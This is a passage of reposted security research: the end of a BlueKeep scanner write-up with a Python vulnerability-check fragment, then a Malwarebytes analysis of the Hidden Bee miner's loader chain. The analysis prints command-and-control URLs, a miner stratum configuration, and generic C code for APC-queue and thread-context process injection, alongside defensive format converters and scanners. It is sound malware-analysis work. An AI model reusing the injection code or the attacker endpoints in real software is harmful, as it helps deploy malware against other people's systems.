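        s.settimeout(timeout)  # wait up to 5 seconds, as the PoC does
        try:
            # A vulnerable host closes the MS_T120 channel and answers with
            # an MCS Disconnect Provider Ultimatum PDU; a patched host
            # ignores the bogus channel message and sends nothing back.
            return "VULNERABLE" if s.recv(1024) else "PATCHED"
        except socket.timeout:
            return "PATCHED"
    finally:
        s.close()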
CPU Architecture Differences
Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes on the two architectures, so one might think that sending both at once would cause the denial-of-service. Simply put: besides the sizes being different, the message opcode is at a different offset. So on the opposite architecture, with a zeroed-out packet (besides the opcode), the server will think you are trying to perform the Connect 0x0 message. The Connect 0x0 message requires a much larger message and other miscellaneous checks to pass before proceeding. The message meant for the other architecture will just be ignored.
This difference can possibly also be used in an RCE exploit to detect whether the target is x86 or x64, if a universal payload is not used.
Conclusion
This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch; however, it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat itself and people will use this tool before a crisis.
Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet. To my knowledge, the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and me, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology.
While this blog post discusses new details about RDP internals related to the vulnerability, it does not contain useful information for producing an RCE exploit that is not already widely known.
Posted by zerosum0x0 at 12:00:00 AM

Sursa: https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html
  25. Hidden Bee: Let's go down the rabbit hole
Posted: May 31, 2019 by hasherezade
Last updated: June 1, 2019
Some time ago, we discussed the interesting malware Hidden Bee. It is a Chinese miner, composed of userland components as well as of a bootkit part. One of its unique features is a custom format used for some of the high-level elements (this format was featured in my recent presentation at SAS). Recently, we stumbled upon a new sample of Hidden Bee. As it turns out, its authors decided to redesign some elements, as well as the formats used. In this post, we will take a deep dive into the functionality of the loader and the changes it includes.
Sample
831d0b55ebeb5e9ae19732e18041aa54 - shared by @James_inthe_box
Overview
Hidden Bee runs silently—only increased processor usage can hint that the system is infected. More can be revealed with the help of tools inspecting the memory of running processes.
Initially, the main sample installs itself as a Windows service:
Hidden Bee service
However, once the next component is downloaded, this service is removed. The payloads are injected into several applications, such as svchost.exe, msdtc.exe, dllhost.exe, and WmiPrvSE.exe. If we scan the system with hollows_hunter, we can see that there are some implants in the memory of those processes:
Results of the scan by hollows_hunter
Indeed, if we take a look inside each process' memory (with the help of Process Hacker), we can see atypical executable elements:
Hidden Bee implants are placed in RWX memory
Some of them are lacking typical PE headers, for example:
Executable in one of the multiple customized formats used by Hidden Bee
But in addition to this, we can also find PE files implanted at unusual addresses in the memory:
Manually-loaded PE files in the memory of WmiPrvSE.exe
Those manually-loaded PE files turned out to be legitimate DLLs: OpenCL.dll and cudart32_80.dll (NVIDIA CUDA Runtime, Version 8.0.61). CUDA is a technology belonging to NVidia graphic cards, so their presence suggests that the malware uses the GPU in order to boost the mining performance.
When we inspect the memory even closer, we see within the executable implants some strings referencing LUA components:
Strings referencing the LUA scripting language, used by Hidden Bee components
Those strings are typical for the Hidden Bee miner, and they were also mentioned in previous reports. We can also see strings referencing the mining activity, i.e. the Cryptonight miner.
List of modules:
bin/i386/coredll.bin
dispatcher.lua
bin/i386/ocl_detect.bin
bin/i386/cuda_detect.bin
bin/amd64/coredll.bin
bin/amd64/algo_cn_ocl.bin
lib/amd64/cudart64_80.dll
src/cryptonight.cl
src/cryptonight_r.cl
bin/i386/algo_cn_ocl.bin
config.lua
lib/i386/cudart32_80.dll
src/CryptonightR.cu
bin/i386/algo_cn.bin
bin/amd64/precomp.bin
bin/amd64/ocl_detect.bin
bin/amd64/cuda_detect.bin
lib/amd64/opencl.dll
lib/i386/opencl.dll
bin/amd64/algo_cn.bin
bin/i386/precomp.bin
And we can even retrieve the miner configuration:
configuration.set("stratum.connect.timeout",20)
configuration.set("stratum.login.timeout",60)
configuration.set("stratum.keepalive.timeout",240)
configuration.set("stratum.stream.timeout",360)
configuration.set("stratum.keepalive",true)
configuration.set("job.idle.count",30)
configuration.set("stratum.lock.count",30)
configuration.set("miner.protocol","stratum+ssl://r.twotouchauthentication.online:17555/")
configuration.set("miner.username",configuration.uuid())
configuration.set("miner.password","x")
configuration.set("miner.agent","MinGate/5.1")
Inside
Hidden Bee has a long chain of components that finally lead to loading the miner. On the way, we will find a variety of customized formats: data packages, executables, and filesystems. The filesystems are mounted in the memory of the malware, and additional plugins and configuration are retrieved from there. Hidden Bee communicates with the C&C to retrieve the modules—on the way also using its own TCP-based protocol. The first part of the loading process is described by the following diagram:
Each of the .spk packages contains a custom 'SPUTNIK' filesystem, containing more executable modules.
Starting the analysis from the loader, we will go down to the plugins, showing the inner workings of each element taking part in the loading process.
The loader
In contrast to most of the malware that we see nowadays, the loader is not packed by any crypter. According to the header, it was compiled in November 2018. While in the former edition the modules in the custom formats were dropped as separate files, this time the next stage is unpacked from inside the loader.
The loader is not obfuscated. Once we load it with typical tools (IDA), we can clearly see how the new format is loaded.
The loading function
Section .shared contains the configuration:
Encrypted configuration. The last 16 bytes after the data block are the key.
The configuration is decrypted with the help of the XTEA algorithm.
Decrypting the configuration
The decrypted configuration must start with the magic WORD "pZ". It contains the C&C and the name under which the service will be installed:
Unscrambling the NE format
The NE format was seen before, in former editions of Hidden Bee. It is just a scrambled version of the PE. By observing which fields have been misplaced, we can easily reconstruct the original PE.
The loader, unpacking the next stage
NE is one of the two similar formats being used by this malware. Another similar one starts with a DWORD 0x0EF1FAB9 and is used to further load components. Both of them have an analogous structure that comes from a slightly modified PE format:
Header:
WORD magic; // 'NE'
WORD pe_offset;
WORD machine_id;
The conversion back to PE format is trivial: it is enough to add the erased magic numbers, MZ and PE, and to move the displaced fields back to their original offsets. The tool that automatically does the mentioned conversion is available here.
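As an illustration, here is a minimal Python sketch of such a converter. It follows one plausible reading of the three-field header above (the linked tool is the authoritative version; the exact placement of the displaced fields may differ):

import struct, sys

# Rebuild a PE from the scrambled 'NE' header described above:
# restore the erased MZ/PE magics and move the displaced fields back.
data = bytearray(open(sys.argv[1], "rb").read())
magic, pe_offset, machine_id = struct.unpack_from("<2sHH", data, 0)
assert magic == b"NE", "not an NE-scrambled PE"

data[0:2] = b"MZ"                                        # restore DOS magic
struct.pack_into("<I", data, 0x3C, pe_offset)            # restore e_lfanew
data[pe_offset:pe_offset + 4] = b"PE\x00\x00"            # restore NT signature
struct.pack_into("<H", data, pe_offset + 4, machine_id)  # restore Machine field

open(sys.argv[1] + ".fixed.exe", "wb").write(bytes(data))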
In the previous edition, the parts of Hidden Bee with analogous functionality were delivered in a different, more complex proprietary format than the one currently being analyzed.

Second stage: a downloader (in NE format)

As a result of the conversion, we get the following PE: fddfd292eaf33a490224ebe5371d3275. This module is a downloader of the next stage. Interestingly, the subsystem of this module is set as a driver; however, it is not loaded like a typical driver. The custom loader loads it into user space just like any other userland component.

The function at the module's Entry Point is called with three parameters. The first is the path of the main module. Then, the parameters from the configuration are passed. Example:

0012FE9C 00601A34 UNICODE "\"C:\Users\tester\Desktop\new_bee.exe\""
0012FEA0 00407104 UNICODE "NAPCUYWKOxywEgrO"
0012FEA4 00407004 UNICODE "118.41.45.124:9000"

Calling the Entry Point of the manually-loaded NE module

The execution of the module can take one of two paths. The first is meant for adding persistence: The module installs itself as a service. If the module detects that it is already running as a service, it takes the second path: It proceeds to download the next module from the server. The next module is packed as a Cabinet file.

The downloaded Cabinet file is passed to the unpacking function

It is first unpacked into a file named "core.sdb". The unpacked module is in another customized format based on PE. This time, the format has a different signature, "NS", and differs from the aforementioned "NE" format (a detailed explanation will follow). It is loaded by the proprietary loader.

The loader enumerates all the executables in the directory %Systemroot%\Microsoft.NET\ and selects the ones with compatible bitness (in the analyzed case, it was selecting 32-bit PEs). Once it finds a suitable PE, it runs it and injects the payload there. The injected code is run by adding its entry point to the APC queue.

Hidden Bee component injecting the next stage (core.sdb) into a new process

If it fails to find a suitable executable in that directory, it performs the injection into dllhost.exe instead.

Unscrambling the NS format

As mentioned before, core.sdb is in yet another format, named NS. It is also a customized PE; however, this time the conversion is more complex than for the NE format, because more structures are customized. It looks like the next step in the evolution of the NE format.

Header of the NS format

We can see that the changes to the PE headers are bigger and more lossy; only minimal information is maintained, and only a few Data Directories are left. The section table is also shrunk: Each section header contains only four out of the nine fields present in the original PE. Additionally, the format allows passing a runtime argument from the loader to the payload via the header: The pointer is saved into an additional field (marked "Filled Data" in the picture).

Not only the PE header is shrunk; similar customization is applied to the Import Table:

Customized part of the NS format's import table

This custom format can also be converted back to the PE format with the help of a dedicated converter, available here.
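Returning to the injection used by this stage: queuing the payload's entry point as an APC in a freshly spawned process is a well-known pattern. The sketch below shows the generic, textbook variant (spawn suspended, allocate and write the payload, queue the APC, resume); it is an illustration of the technique, not Hidden Bee's exact implementation.

/* apc_inject.c - generic sketch of APC-queue injection. */
#include <windows.h>

int inject_via_apc(const char *host_exe, const unsigned char *payload,
                   SIZE_T payload_size, DWORD ep_offset)
{
    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };

    /* spawn the host process suspended */
    if (!CreateProcessA(host_exe, NULL, NULL, NULL, FALSE,
                        CREATE_SUSPENDED, NULL, NULL, &si, &pi))
        return -1;

    /* map the payload into the new process */
    LPVOID remote = VirtualAllocEx(pi.hProcess, NULL, payload_size,
                                   MEM_COMMIT | MEM_RESERVE,
                                   PAGE_EXECUTE_READWRITE);
    if (!remote || !WriteProcessMemory(pi.hProcess, remote, payload,
                                       payload_size, NULL)) {
        TerminateProcess(pi.hProcess, 1);
        return -1;
    }

    /* the queued APC fires once the main thread becomes alertable */
    QueueUserAPC((PAPCFUNC)((LPBYTE)remote + ep_offset), pi.hThread, 0);
    ResumeThread(pi.hThread);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}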
Third stage: core.sdb

The core.sdb module converted to the PE format is available here: a17645fac4bcb5253f36a654ea369bf9. The interesting part is that the external loader does not complete the full loading process of the module; it only copies the sections. The rest of the loading, such as applying relocations and filling imports, is done internally by core.sdb itself.

The loading function is just at the Entry Point of core.sdb

The previous component was supposed to pass core.sdb an additional buffer with data about the installed service: the name and the path. During its execution, core.sdb looks up this data. If found, it deletes the previously-created service, as well as the initial file that started the infection:

Removing the initial service

Getting rid of the previous persistence method suggests that it will be replaced by a different technique. Knowing previous editions of Hidden Bee, we can suspect that it may be a bootkit.

After locking a mutex whose name follows the format Global\SC_{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, the module proceeds to download another component. But before the download, a few things are checked:

Checks done before download of the next module

First of all, there is a defensive check whether any of the known debuggers or sniffers are running. If so, the function quits.

The blacklist

There is also a check whether the application can open the file '\??\NPF-{0179AC45-C226-48e3-A205-DCA79C824051}'. If all the checks pass, the function proceeds and queries the following URL, where the GET variables contain the system fingerprint:

sltp://bbs.favcom.space:1108/setup.bin?id=999&sid=0&sz=a7854b960e59efdaa670520bb9602f87&os=65542&ar=0

The hash (sz=) is an MD5 generated from VolumeIDs. The os= parameter identifies the version of the operating system, and ar= the architecture, where 0 means 32-bit and 1 means 64-bit.

The content downloaded from this URL (starting with the magic DWORD 0xFEEDFACE – 79e851622ac5298198c04034465017c0) contains an encrypted package (in the !rbx format) and a shellcode that will be used to unpack it. The shellcode is loaded into the current process and then executed.

The 'FEEDFACE' module contains the shellcode to be loaded

The shellcode's start function takes three parameters: a pointer to the functions of the previous module (core.sdb), a pointer to the buffer with the encrypted data, and the size of the encrypted data.

The loader calling the shellcode

Fourth stage: the shellcode decrypting !rbx

The beginning of the loaded shellcode:

The shellcode does not fill any imports by itself. Instead, it fully relies on the functions from the core.sdb module, to which it receives a pointer. It makes use of the following functions: malloc, memcpy, memfree, VirtualAlloc. Example:

Calling malloc via core.sdb

Its role is to reveal the next part, which comes in an encrypted package starting with the marker !rbx. The decryption function is called right at the beginning:

Calling the decrypting function (at the Entry Point of the shellcode)

First, the function checks the !rbx marker and the checksum at the beginning of the encrypted buffer:

Checking the marker, and then the checksum

The package is decrypted with the help of the RC4 algorithm, and then decompressed. After decryption, the markers at the beginning of the output buffer are checked: The expected content must start with the predefined magic DWORDs 0xCAFEBABE, 0, 0xBABECAFE.

The !rbx package format

The !rbx package is also a custom format with a consistent structure:

DWORD magic; // "!rbx"
DWORD checksum;
DWORD content_size;
BYTE rc4_key[16];
DWORD out_size;
BYTE content[];
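Following the structure above, parsing and decrypting a !rbx package can be sketched in a few lines. Standard RC4 is assumed here; the checksum algorithm and the decompression step that produces out_size bytes are not documented, so they are left as comments.

/* rbx_unpack.c - sketch of the !rbx parsing/decryption described above. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#pragma pack(push, 1)
typedef struct {
    uint32_t magic;        /* "!rbx" */
    uint32_t checksum;
    uint32_t content_size;
    uint8_t  rc4_key[16];
    uint32_t out_size;     /* size after decompression */
    uint8_t  content[];
} rbx_header;
#pragma pack(pop)

static void rc4(const uint8_t *key, size_t keylen, uint8_t *data, size_t len)
{
    uint8_t S[256];
    for (int i = 0; i < 256; i++) S[i] = (uint8_t)i;
    for (int i = 0, j = 0; i < 256; i++) {           /* key scheduling */
        j = (j + S[i] + key[i % keylen]) & 0xFF;
        uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
    }
    for (size_t k = 0, i = 0, j = 0; k < len; k++) { /* keystream + XOR */
        i = (i + 1) & 0xFF;
        j = (j + S[i]) & 0xFF;
        uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
        data[k] ^= S[(S[i] + S[j]) & 0xFF];
    }
}

int rbx_decrypt(uint8_t *pkg, size_t size)
{
    rbx_header *h = (rbx_header *)pkg;
    if (size < sizeof(*h) || memcmp(&h->magic, "!rbx", 4) != 0)
        return -1;                          /* wrong marker */
    if (sizeof(*h) + h->content_size > size)
        return -1;                          /* truncated package */
    /* checksum verification would go here */
    rc4(h->rc4_key, sizeof(h->rc4_key), h->content, h->content_size);
    /* decompression (content_size -> out_size) and the
       CAFEBABE/BABECAFE marker check would follow */
    return 0;
}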
The custom file system (BABECAFE)

The fully decrypted content has a consistent structure, reminiscent of a file system. According to previous reports, earlier versions of Hidden Bee adapted the ROM FS filesystem, adding a few modifications; the authors called their customized version "Mixed ROM FS". Now it seems that their customization has progressed further, and the keywords suggesting ROM FS can no longer be found. The header starts with markers in the form of three DWORDs: { 0xCAFEBABE, 0, 0xBABECAFE }.

The layout of the BABECAFE FS:

We notice that it differs at many points from ROM FS, from which it evolved. The structure contains the following files:

/bin/amd64/coredll.bin
/bin/i386/coredll.bin
/bin/i386/preload
/bin/amd64/preload
/pkg/sputnik.spk
/installer/com_x86.dll (6177bc527853fe0f648efd17534dd28b)
/installer/com_x64.dll
/pkg/plugins.spk

The files /pkg/sputnik.spk and /pkg/plugins.spk are both compressed packages in a custom !rsi format.

Beginning of the !rsi package in the BABECAFE FS

Each of the .spk packages contains another custom filesystem, identified by the keyword SPUTNIK (possibly the extension 'spk' is derived from the SPUTNIK format). They will be unpacked during the next steps of the execution. Unpacked plugins.spk: 4c01273fb77550132c42737912cbeb36. Unpacked sputnik.spk: 36f3247dad5ec73ed49c83e04b120523.

Selecting and running modules

Some executables stored in the filesystem come in two versions: 32- and 64-bit. Only the modules relevant to the current architecture are loaded. So, in the analyzed case, the loader first chooses /bin/i386/preload (a shellcode) and /bin/i386/coredll.bin (a module in the custom NS format). The names are hardcoded in the loading shellcode:

Searching the modules in the custom file system

After the proper elements are fetched (preload and coredll.bin), they are copied together into a newly-allocated memory area, with coredll.bin placed just after preload. Then, the preload module is called:

Redirecting execution to preload

The preload is position-independent, and its execution starts from the beginning of the page.

Entering 'preload'

The only role of this shellcode is to prepare and run coredll.bin: It contains a custom loader for the NS format that allocates another memory area and loads the NS file there.

Fifth stage: preload and coredll

After loading coredll, preload redirects execution there.

coredll at its Entry Point

The coredll patches a function inside NTDLL, KiUserExceptionDispatcher, redirecting one of the inner calls to its own code:

A patch inside KiUserExceptionDispatcher

Depending on which process coredll was injected into, it can take one of a few execution paths. If it is running for the first time, it tries to inject itself again, this time into rundll32. For the purpose of the injection, it unpacks the original !rbx package once more and uses the original copy of itself stored there:

Entering the unpacking function

Inside the unpacking function: checking the magic "!rbx"
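An aside for analysts: Because every decrypted image starts with the fixed three-DWORD marker, carving BABECAFE filesystem candidates out of raw memory dumps is straightforward. A minimal sketch (assumes a little-endian dump, as produced on x86):

/* babecafe_scan.c - find BABECAFE filesystem candidates in a dump. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <dump>\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror("fopen"); return 1; }
    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    fseek(f, 0, SEEK_SET);
    uint8_t *buf = malloc(size);
    if (!buf || fread(buf, 1, size, f) != (size_t)size) return 1;
    fclose(f);

    /* { 0xCAFEBABE, 0, 0xBABECAFE }, as stored little-endian in memory */
    const uint32_t marker[3] = { 0xCAFEBABE, 0, 0xBABECAFE };
    for (long i = 0; i + (long)sizeof(marker) <= size; i++)
        if (memcmp(buf + i, marker, sizeof(marker)) == 0)
            printf("BABECAFE candidate at offset 0x%lx\n", i);

    free(buf);
    return 0;
}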
Then it chooses the modules depending on the bitness of the rundll32: It selects the pair of modules (preload/coredll.bin) appropriate for the architecture, either from the amd64 or from the i386 directory:

If the injection fails, it makes another attempt, this time trying to inject into dllhost:

Each time, the same hardcoded parameter (/Processid: {...}) is passed to the created process:

The thread context of the target process is modified, and then the thread is resumed, running the injected content:
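This "modify the thread context, then resume" step is the classic thread-hijacking pattern. A minimal generic sketch of such a routine (not Hidden Bee's actual code; the target thread is assumed to be suspended):

/* ctx_hijack.c - generic sketch of thread-context hijacking. */
#include <windows.h>

int hijack_thread(HANDLE hThread, LPVOID remote_entry)
{
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_CONTROL;  /* only the control registers */
    if (!GetThreadContext(hThread, &ctx))
        return -1;
#ifdef _WIN64
    ctx.Rip = (DWORD64)remote_entry;     /* redirect execution */
#else
    ctx.Eip = (DWORD)remote_entry;
#endif
    if (!SetThreadContext(hThread, &ctx))
        return -1;
    ResumeThread(hThread);               /* run the injected content */
    return 0;
}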
Now, when we look inside the memory of rundll32, we can find the preload and coredll mapped:

Inside the injected part, the execution follows a similar path: preload loads the coredll and redirects to its Entry Point. But then another path of execution is taken: The parameter passed to the coredll decides which round of execution it is. In the second round, another injection is made, this time into dllhost.exe. Finally, it proceeds to the last round, in which other modules are unpacked from the BABECAFE filesystem.

Parameter deciding which path to take

The unpacking function first searches, by name, for two more modules: sputnik.spk and plugins.spk. They are both in the mysterious !rsi format, which is reminiscent of !rbx but has a slightly different structure.

Entering the function unpacking the first !rsi package:

The function unpacking the !rsi format is structured similarly to the one unpacking !rbx. It also starts by checking the keyword:

Checking the "!rsi" keyword

As mentioned before, both !rsi packages store filesystems marked with the keyword "SPUTNIK". It is yet another custom filesystem invented by the Hidden Bee authors, containing additional modules.

The "SPUTNIK" keyword is checked after the module is unpacked

Unpacking sputnik.spk resulted in the following SPUTNIK module: 455738924b7665e1c15e30cf73c9c377

It is worth noting that the unpacked filesystem contains four executables: two pairs, each consisting of an NS and a PE file, in 32- and 64-bit versions respectively. In the currently-analyzed setup, the 32-bit versions are deployed. The NS module is the next to be run. First, it is loaded by the current executable, and then the execution is redirected there. Interestingly, both !rsi modules are passed as arguments to the entry point of the new module. (They will be used later to retrieve more components.)

Calling the newly-loaded NS executable

Sixth stage: mpsi.dll (unpacked from SPUTNIK)

Entering the NS module starts another layer of the malware:

Entry Point of the NS module: the !rsi modules, prepended with their size, are passed

The analyzed module, converted to PE, is available here: 537523ee256824e371d0bc16298b3849

This module is responsible for loading plugins. It also creates a named pipe through which it communicates with other modules, and it sets up the commands that are going to be executed on demand. This is how the beginning of the main function looks:

Like in previous cases, it starts by finishing its own loading (relocations and imports). Then, it patches the function in NTDLL. This is a common prolog in many Hidden Bee modules. Then comes another phase of loading elements from the supplied packages. The path taken depends on the runtime arguments: If the function received both !rsi packages, it starts by parsing one of them and retrieving the submodules.

First, the SPUTNIK filesystem must be unpacked from the !rsi package. After being unpacked, it is mounted. The filesystems are mounted internally, in memory: A global structure is filled with pointers to the appropriate elements of the filesystem.

At the beginning, we can see the list of the plugins that are going to be loaded: cloudcompute.api, deepfreeze.api, and netscan.api. Those names are appended to the root path of the modules. Each module is fetched from the mounted filesystem and loaded:

Calling the function to load the plugin

Consecutive modules are loaded one after another into the same executable memory area. After a module is loaded, its header is erased. This is a common technique used to make dumping the payload from memory more difficult. The cloudcompute.api is the plugin that will load the miner. More about the plugins is explained in the next section of this post.

Reading its code, we find out that the SPUTNIK modules are filesystems that can be mounted and dismounted on demand. This module communicates with the others through a named pipe: It receives commands and executes the appropriate handlers.

Initialization of the commands' parser:

The function setting up the commands:

For each name, a handler is registered. (This is probably the Lua dispatcher, first described here.)

When the plugins are run, we can see some additional child processes created by the process running the coredll (in the analyzed case, inside rundll32):

It also triggers a firewall alert, which means the malware requested to open some ports (triggered by the netscan.api plugin):

We can see that it started listening on one TCP and one UDP port:

The plugins

As mentioned in the previous section, the SPUTNIK filesystem contains three plugins: cloudcompute.api, deepfreeze.api, and netscan.api. If we convert them to PE, we can see that all of them import an unknown DLL: mpsi.dll. Looking at the filled import table, we find that the addresses resolve to functions from the previous NS module:

So we can conclude that the previous element is mpsi.dll. Although its export table has been destroyed, the functions are fetched by the custom loader and filled into the import tables of the loaded plugins.

First, cloudcompute.api is run. This plugin retrieves from the filesystem a file named "/etc/ccmain.json" that contains a list of URLs:

Those are the addresses from which another set of modules is going to be downloaded:

["sstp://news.onetouchauthentication.online:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.club:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.icu:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.xyz:443/mlf_plug.zip.sig"]

It also retrieves another component from the SPUTNIK filesystem: /bin/i386/ccmain.bin. This time, it is an executable in the NE format (a version converted to PE is available here: 367db629beedf528adaa021bdb7c12de). This is the component that is injected into msdtc.exe.

The Hidden Bee module mapped into msdtc.exe

The configuration is also copied into the remote process and is used to retrieve an additional package from the C&C. This is the plugin responsible for downloading and deploying the Mellifera miner, the core component of Hidden Bee.

Next, netscan.api loads the module /bin/i386/kernelbase.bin (converted to PE: d7516ad354a3be2299759cd21e161a04).
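The command handling described above follows a common dispatcher design: a table mapping command names to handler functions, filled during setup and consulted for every message read from the pipe. Below is a minimal sketch of that scheme; the command names and handler bodies are hypothetical placeholders, not Hidden Bee's actual commands.

/* cmd_table.c - sketch of a name -> handler command dispatcher. */
#include <stdio.h>
#include <string.h>

typedef int (*cmd_handler)(const char *args);

typedef struct {
    const char *name;
    cmd_handler handler;
} cmd_entry;

/* hypothetical handlers, for illustration only */
static int handle_mount(const char *args) { (void)args; return 0; }
static int handle_load(const char *args)  { (void)args; return 0; }

static cmd_entry g_commands[32];
static int g_count;

static void register_command(const char *name, cmd_handler h)
{
    if (g_count < 32) {
        g_commands[g_count].name = name;
        g_commands[g_count].handler = h;
        g_count++;
    }
}

static int dispatch(const char *name, const char *args)
{
    for (int i = 0; i < g_count; i++)
        if (strcmp(g_commands[i].name, name) == 0)
            return g_commands[i].handler(args);
    return -1; /* unknown command */
}

int main(void)
{
    /* registration phase, analogous to the setup function above */
    register_command("mount", handle_mount);
    register_command("load",  handle_load);
    /* each message read from the named pipe would then be dispatched */
    return dispatch("mount", "/pkg/plugins.spk");
}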
The miner in APT-style

Hidden Bee is an eclectic piece of malware. Although it is commodity malware used for cryptocurrency mining, its design reminds us of espionage platforms used by APTs. Going through all of its components is exhausting, but also fascinating. The authors are highly professional, not only as individuals but also as a team, because the design is consistent in all its complexity.

Appendix

https://github.com/hasherezade/hidden_bee_tools – helper tools for parsing and converting Hidden Bee custom formats

https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/

Articles about the previous version (in Chinese):

https://www.freebuf.com/column/174581.html
https://www.freebuf.com/column/175106.html

Our first encounter with Hidden Bee:

https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/

Sursa: https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/